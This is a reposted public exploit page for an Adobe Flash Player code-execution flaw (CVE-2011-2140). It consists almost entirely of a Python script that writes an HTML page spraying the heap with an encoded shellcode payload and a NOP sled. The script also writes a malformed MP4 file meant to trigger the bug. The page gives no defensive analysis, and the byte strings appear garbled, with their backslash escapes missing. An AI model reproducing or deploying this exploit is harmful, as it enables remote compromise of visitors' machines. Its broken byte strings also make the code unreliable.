Home / exploitsPDF  

Adobe Flash Player Code Execution

Posted on 01 February 2012

# Abysssec Public Exploit
# CVE-2011-2140
# This exploit tested on Adobe Flash Player <= 10.3.181.34 ( XP sp3 )
# twitter : @abysssec
# contact : info [at] abysssec.com
# http://www.abysssec.com/blog/2012/01/31/exploiting-cve-2011-2140-another-flash-player-vulnerability
#
#
import sys
def spray_heap():
 spray = '''
 function spray_heap()
 {
var payload = unescape("%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407%u6730%u5cff%u98bb%ud7ff%ua4fe%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3%u1f4c%ueb46%u4b8c%ud0ad%ua844%u524a%u3b81%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba%u9782%u217c%ue8c0%uca8c%uf4a6%u4721%u0d2e%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580");
var spray = unescape("%u9090%u9090");
 do {
 spray += spray;
 }
 while(spray.length < 0xA0000);
 memory = new Array();
 for(i = 0; i < 100; i++)
 memory[i] = spray + payload;
}
 '''
 return spray
def createMP4():
 mp4 = ""
 ftypAtom = "x00x00x00x20x66x74x79x70x69x73x6Fx6Dx00x00x02x00x69x73x6Fx6Dx69x73x6Fx32x61x76x63x31x6Dx70x34x31"
 mdatAtom = "x00x00x00x10x6Dx64x61x74x00x00x02x8Bx06x05xFFxFF"
 moovAtom1 = "x00x00x08x83x6Dx6Fx6Fx76x00x00x00x6Cx6Dx76x68x64x00x00x00x00x7Cx25xB0x80x7Cx25xB0x80x00"
 moovAtom1 +="x00x03xE8x00x00x2Fx80x00x01x00x00x01x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00"
 moovAtom1 +="x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x40"
 moovAtom1 +="x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
 moovAtom1 +="x00x00x03x00x00x02xFAx74x72x61x6Bx00x00x00x5Cx74x6Bx68x64x00x00x00x0Fx7Cx25xB0x80x7C"
 moovAtom1 +="x25xB0x80x00x00x00x01x00x00x00x00x00x00x2ExE0x00x00x00x00x00x00x00x00x00x00x00x00x00"
 moovAtom1 +="x00x00x00x00x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00"
 moovAtom1 +="x00x00x00x00x00x00x00x40x00x00x00x01x42x00x00x01x42x00x00x00x00x02x72x6Dx64x69x61x00"
 moovAtom1 +="x00x00x20x6Dx64x68x64x00x00x00x00x7Cx25xB0x80x7Cx25xB0x80x00x00x00x01x00x00x00x0Cx55"
 moovAtom1 +="xC4x00x00x00x00x00x2Dx68x64x6Cx72x00x00x00x00x00x00x00x00x76x69x64x65x00x00x00x00x00"
 moovAtom1 +="x00x00x00x00x00x00x00x56x69x64x65x6Fx48x61x6Ex64x6Cx65x72x00x00x00x02x1Dx6Dx69x6Ex66"
 moovAtom1 +="x00x00x00x14x76x6Dx68x64x00x00x00x01x00x00x00x00x00x00x00x00x00x00x00x24x64x69x6Ex66"
 moovAtom1 +="x00x00x00x1Cx64x72x65x66x00x00x00x00x00x00x00x01x00x00x00x0Cx75x72x6Cx20x00x00x00x01"
 moovAtom1 +="x00x00x09xDDx73x74x62x6Cx00x00x08x99x73x74x73x64x00x00x00x00x00x00x00x01x00x00x08x89"
 moovAtom1 +="x61x76x63x31x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
 moovAtom1 +="x01x42x01x42x00x48x00x00x00x48x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00x00x00x00"
 moovAtom1 +="x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x18xFFxFFx00x00"
 moovAtom1 +="x08x33x61x76x63x43x01x64x00x15xFFxE1"
 # SPSUnit = SPSUnit Len (2 bytes) + NAL Header (1 byte) + profile_idc (1 byte) + Flags and Reserved (1 byte) + levelidc (1 byte) +
 # seq_parameter_set_id (variable) + log2_max_frame_num_minus4 (variable) + pic_order_cnt_type = 1 (variable) +
 # delta_pic_order_always_zero_flag (1 bit) + offset_for_non_ref_pic (num_ref_frames_in_pic_order_cnt_cycle) + offset_for_top_to_bottom_field (variable) +
 # num_ref_frames_in_pic_order_cnt_cycle (num_ref_frames_in_pic_order_cnt_cycle) + other bytes
 SPSUnit = "x08x1Ax67x70x34x32x74x70x00x00xAFx88x88x84x00x00x03x00x04x00x00x03x00x3FxFFxFFxFFxFFxFF"
 SPSUnit += "xFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFF"
 SPSUnit += "xFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFFxFCx00x00x00x30x30x30x30x00x00x00x18"
 SPSUnit += "x18x18x18x00x00x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06x00x00x00x03x03x03x03x00x00x00x01x81"
 SPSUnit += "x81x81x80x00x00x00xC0xC0xC0xC0x00x00x00x60x60x60x60x00x00x00x30x30x30x30x00x00x00x18x18"
 SPSUnit += "x18x18x00x00x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06x00x00x00x03x03x03x03x00x00x00x01x81x81"
 SPSUnit += "x81x80x00x00x00xC0xC0xC0xC0x00x00x00x60x60x60x60x00x00x00x30x30x30x30x00x00x00x18x18x18"
 SPSUnit += "x18x00x00x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06x00x00x00x03x03x03x03x00x00x00x01x81x81x81"
 SPSUnit += "x80x00x00x00xC0xC0xC0xC0x00x00x00x60x60x60x60x00x00x00x30x30x30x30x00x00x00x18x18x18x18"
 SPSUnit += "x00x00x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06x00x00x00x03x03x03x03x00x00x00x01x81x81x81x80"
 SPSUnit += "x00x00x00xC0xC0xC0xC0x00x00x00x60x60x60x60x00x00x00x30x30x30x30x00x00x00x18x18x18x18x00"
 SPSUnit += "x00x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06x00x00x00x03x03x03x03x00x00x00x01x81x81x81x80x00"
 SPSUnit += "x00x00xC0xC0xC0xC0x00x00x00x60x60x60x60x00x00x00x30x30x30x30x00x00x00x18x18x18x18x00x00"
 SPSUnit += "x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06x00x00x00x03x03x03x03x00x00x00x01x81x81x81x80x00x00"
 SPSUnit += "x00xC0xC0xC0xC0x00x00x00x60x60x60x60x00x00x00x30x30x30x30x00x00x00x18x18x18x18x00x00x00"
 SPSUnit += "x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06x00x00x00x03x03x03x03x00x00x00x01x81x81x81x80x00x00x00"
 SPSUnit += "xC0xC0xC0xC0x00x00x00x60x60x60x60x00x00x00x30x30x30x30x00x00x00x18x18x18x18x00x00x00x0C"
 SPSUnit += "x0Cx0Cx0Cx00x00x00x06x06x06x06x00x00x00x03x03x03x03x00x00x00x01x81x81x81x80x00x00x00xC0"
 SPSUnit += "xC0xC0xC0x00x00x00x60x60x60x60x00x00x00x30x30x30x30x00x00x00x18x18x18x18x00x00x00x0Cx0C"
 SPSUnit += "x0Cx0Cx00x00x00x06x06x06x06x00x00x00x03x03x03x03x00x00x00x01x81x81x81x80x00x00x00xC0xC0"
 SPSUnit += "xC0xC0x00x00x00x60x60x60x60x00x00x00x30x30x30x30x00x00x00x18x18x18x18x00x00x00x0Cx0Cx0C"
 SPSUnit += "x0Cx00x00x00x06x06x06x06x00x00x00x03x03x03x03x00x00x00x01x81x81x81x80x00x00x00xC0xC0xC0"
 SPSUnit += "xC0x00x00x00x60x60x60x60x00x00x00x30x30x30x30x00x00x00x18x18x18x18x00x00x00x0Cx0Cx0Cx0C"
 SPSUnit += "x00x00x00x06x06x06x06x00x00x00x03x03x03x03x00x00x00x01x81x81x81x80x00x00x00xC0xC0xC0xC0"
 SPSUnit += "x00x00x00x60x60x60x60x00x00x00x30x30x30x30x00x00x00x18x18x18x18x00x00x00x0Cx0Cx0Cx0Cx00"
 SPSUnit += "x00x00x06x06x06x06x00x00x00x03x03x03x03x00x00x00x01x81x81x81x80x00x00x00xC0xC0xC0xC0x00"
 SPSUnit += "x00x00x60x60x60x60x00x00x00x30x30x30x30x00x00x00x18x18x18x18x00x00x00x0Cx0Cx0Cx0Cx00x00"
 SPSUnit += "x00x06x06x06x06x00x00x00x03x03x03x03x00x00x00x01x81x81x81x80x00x00x00xC0xC0xC0xC0x00x00"
 SPSUnit += "x00x60x60x60x60x00x00x00x30x30x30x30x00x00x00x18x18x18x18x00x00x00x0Cx0Cx0Cx0Cx00x00x00"
 SPSUnit += "x06x06x06x06x00x00x00x03x03x03x03x00x00x00x01x81x81x81x80x00x00x00xC0xC0xC0xC0x00x00x00"
 SPSUnit += "x60x60x60x60x00x00x00x30x30x30x30x00x00x00x18x18x18x18x00x00x00x0Cx0Cx0Cx0Cx00x00x00x06"
 SPSUnit += "x06x06x06x00x00x00x03x03x03x03x00x00x00x01x81x81x81x80x00x00x00xC0xC0xC0xC0x00x00x00x60"
 SPSUnit += "x60x60x60x00x00x00x30x30x30x30x00x00x00x18x18x18x18x00x00x00x0Cx0Cx0Cx0Cx00x00x00x06x06"
 SPSUnit += "x06x06x00x00x00x03x03x03x03x00x00x00x01x81x81x81x80x00x00x00xC0xC0xC0xC0x00x00x00x60x60"
 SPSUnit += "x60x60x00x00x00x30x30x30x30x00x00x00x18x18x18x18x00x00x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06"
 SPSUnit += "x06x00x00x00x03x03x03x03x00x00x00x01x81x81x81x80x00x00x00xC0xC0xC0xC0x00x00x00x60x60x60"
 SPSUnit += "x60x00x00x00x30x30x30x30x00x00x00x18x18x18x18x00x00x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06"
 SPSUnit += "x00x00x00x03x03x03x03x00x00x00x01x81x81x81x80x00x00x00xC0xC0xC0xC0x00x00x00x60x60x60x60"
 SPSUnit += "x00x00x00x30x30x30x30x00x00x00x18x18x18x18x00x00x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06x00"
 SPSUnit += "x00x00x03x03x03x03x00x00x00x01x81x81x81x80x00x00x00xC0xC0xC0xC0x00x00x00x60x60x60x60x00"
 SPSUnit += "x00x00x30x30x30x30x00x00x00x18x18x18x18x00x00x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06x00x00"
 SPSUnit += "x00x03x03x03x03x00x00x00x01x81x81x81x80x00x00x00xC0xC0xC0xC0x00x00x00x60x60x60x60x00x00"
 SPSUnit += "x00x30x30x30x30x00x00x00x18x18x18x18x00x00x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06x00x00x00"
 SPSUnit += "x03x03x03x03x00x00x00x01x81x81x81x80x00x00x00xC0xC0xC0xC0x00x00x00x60x60x60x60x00x00x00"
 SPSUnit += "x30x30x30x30x00x00x00x18x18x18x18x00x00x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06x00x00x00x03"
 SPSUnit += "x03x03x03x00x00x00x01x81x81x81x80x00x00x00xC0xC0xC0xC0x00x00x00x60x60x60x60x00x00x00x30"
 SPSUnit += "x30x30x30x00x00x00x18x18x18x18x00x00x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06x00x00x00x03x03"
 SPSUnit += "x03x03x00x00x00x01x81x81x81x80x00x00x00xC0xC0xC0xC0x00x00x00x60x60x60x60x00x00x00x30x30"
 SPSUnit += "x30x30x00x00x00x18x18x18x18x00x00x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06x00x00x00x03x03x03"
 SPSUnit += "x03x00x00x00x01x81x81x81x80x00x00x00xC0xC0xC0xC0x00x00x00x60x60x60x60x00x00x00x30x30x30"
 SPSUnit += "x30x00x00x00x18x18x18x18x00x00x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06x00x00x00x03x03x03x03"
 SPSUnit += "x00x00x00x01x81x81x81x80x00x00x00xC0xC0xC0xC0x00x00x00x60x60x60x60x00x00x00x30x30x30x30"
 SPSUnit += "x00x00x00x18x18x18x18x00x00x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06x00x00x00x03x03x03x03x00"
 SPSUnit += "x00x00x01x81x81x81x80x00x00x00xC0xC0xC0xC0x00x00x00x60x60x60x60x00x00x00x30x30x30x30x00"
 SPSUnit += "x00x00x18x18x18x18x00x00x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06x00x00x00x03x03x03x03x00x00"
 SPSUnit += "x00x01x81x81x81x80x00x00x00xC0xC0xC0xC0x00x00x00x60x60x60x60x00x00x00x30x30x30x30x00x00"
 SPSUnit += "x00x18x18x18x18x00x00x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06x00x00x00x03x03x03x03x00x00x00"
 SPSUnit += "x01x81x81x81x80x00x00x00xC0xC0xC0xC0x00x00x00x60x60x60x60x00x00x00x30x30x30x30x00x00x00"
 SPSUnit += "x18x18x18x18x00x00x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06x00x00x00x03x03x03x03x00x00x00x01"
 SPSUnit += "x81x81x81x80x00x00x00xC0xC0xC0xC0x00x00x00x60x60x60x60x00x00x00x30x30x30x30x00x00x00x18"
 SPSUnit += "x18x18x18x00x00x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06x00x00x00x03x03x03x03x00x00x00x01x81"
 SPSUnit += "x81x81x80x00x00x00xC0xC0xC0xC0x00x00x00x60x60x60x60x00x00x00x30x30x30x30x00x00x00x18x18"
 SPSUnit += "x18x18x00x00x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06x00x00x00x03x03x03x03x00x00x00x01x81x81"
 SPSUnit += "x81x80x00x00x00xC0xC0xC0xC0x00x00x00x60x60x60x60x00x00x00x30x30x30x30x00x00x00x18x18x18"
 SPSUnit += "x18x00x00x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06x00x00x00x03x03x03x03x00x00x00x01x81x81x81"
 SPSUnit += "x80x00x00x00xC0xC0xC0xC0x00x00x00x60x60x60x60x00x00x00x30x30x30x30x00x00x00x18x18x18x18"
 SPSUnit += "x00x00x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06x00x00x00x03x03x03x03x00x00x00x01x81x81x81x80"
 SPSUnit += "x00x00x00xC0xC0xC0xC0x00x00x00x60x60x60x60x00x00x00x30x30x30x30x00x00x00x18x18x18x18x00"
 SPSUnit += "x00x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06x00x00x00x03x03x03x03x00x00x00x01x81x81x81x80x00"
 SPSUnit += "x00x00xC0xC0xC0xC0x00x00x00x60x60x60x60x00x00x00x30x30x30x30x00x00x00x18x18x18x18x00x00"
 SPSUnit += "x00x0Cx0Cx0Cx0Cx00x00x00x06x06x06x06x00x00x00x03x03x03x03x00x00x00x01x81x81x81x80x00x00"
 SPSUnit += "x00xC0xC0xC0xC0x00x00x00x60x60x60x60x00x00x00x30x30x03x03x03x03x00x00x00xB2x2C"
 moovAtom2 = "x00x00x00x18x73x74x74x73x00x00x00x00x00x00x00x01x00x00x00x0Cx00x00x00x01x00x00x00x14x73"
 moovAtom2 += "x74x73x73x00x00x00x00x00x00x00x01x00x00x00x01x00x00x00x70x63x74x74x73x00x00x00x00x00x00"
 moovAtom2 += "x00x0Cx00x00x00x01x00x00x00x02x00x00x00x01x00x00x00x03x00x00x00x01x00x00x00x01x00x00x00"
 moovAtom2 += "x01x00x00x00x03x00x00x00x01x00x00x00x01x00x00x00x01x00x00x00x05x00x00x00x01x00x00x00x02"
 moovAtom2 += "x00x00x00x01x00x00x00x00x00x00x00x01x00x00x00x01x00x00x00x01x00x00x00x03x00x00x00x01x00"
 moovAtom2 += "x00x00x01x00x00x00x01x00x00x00x02x00x00x00x1Cx73x74x73x63x00x00x00x00x00x00x00x01x00x00"
 moovAtom2 += "x00x01x00x00x00x01x00x00x00x01x00x00x00x44x73x74x73x7Ax00x00x00x00x00x00x00x00x00x00x00"
 moovAtom2 += "x0Cx00x00x2Fx8Dx00x00x0CxFEx00x00x04x42x00x00x0Bx20x00x00x04x58x00x00x07x19x00x00x07x63"
 moovAtom2 += "x00x00x02xD6x00x00x03xC1x00x00x0AxDFx00x00x04x9Bx00x00x09x39x00x00x00x40x73x74x63x6Fx00"
 moovAtom2 += "x00x00x00x00x00x00x0Cx00x00x00x30x00x00x2FxBDx00x00x3Dx8Ax00x00x48x19x00x00x5AxF4x00x00"
 moovAtom2 += "x66x1Fx00x00x73xEAx00x00x82x32x00x00x8AxFAx00x00x95x51x00x00xA7x16x00x00xB1xE5"
 moovAtom = moovAtom1 + SPSUnit + moovAtom2
 mp4 = ftypAtom + mdatAtom + moovAtom
 return mp4
def main():
 try:
 fHtml = open('exploit.html', 'wb+')
 contentHTML = '<html><script type="text/javascript">' + spray_heap() + '</script><body onload = "spray_heap()"><object width="320" height="204" type="application/x-shockwave-flash" data="mediaplayer.swf?autostart=true&image=video.jpg&file=exploit.mp4"><param name="movie" value="mediaplayer.swf?autostart=true&image=video.jpg&file=exploit.mp4"></object></body></html>'
 fHtml.write(contentHTML)
 fHtml.close()
 fMP4 = open('exploit.mp4', 'wb+')
 fMP4.write(createMP4())
 fMP4.close()
 print '[-] MP4 and Html files generated'
 except IOError:
 print '[*] Error : An IO error has occurred'
 print '[-] Exiting ...'
 sys.exit(-1)
if __name__ == '__main__':
 main()

 

TOP

Malware :

Exploits :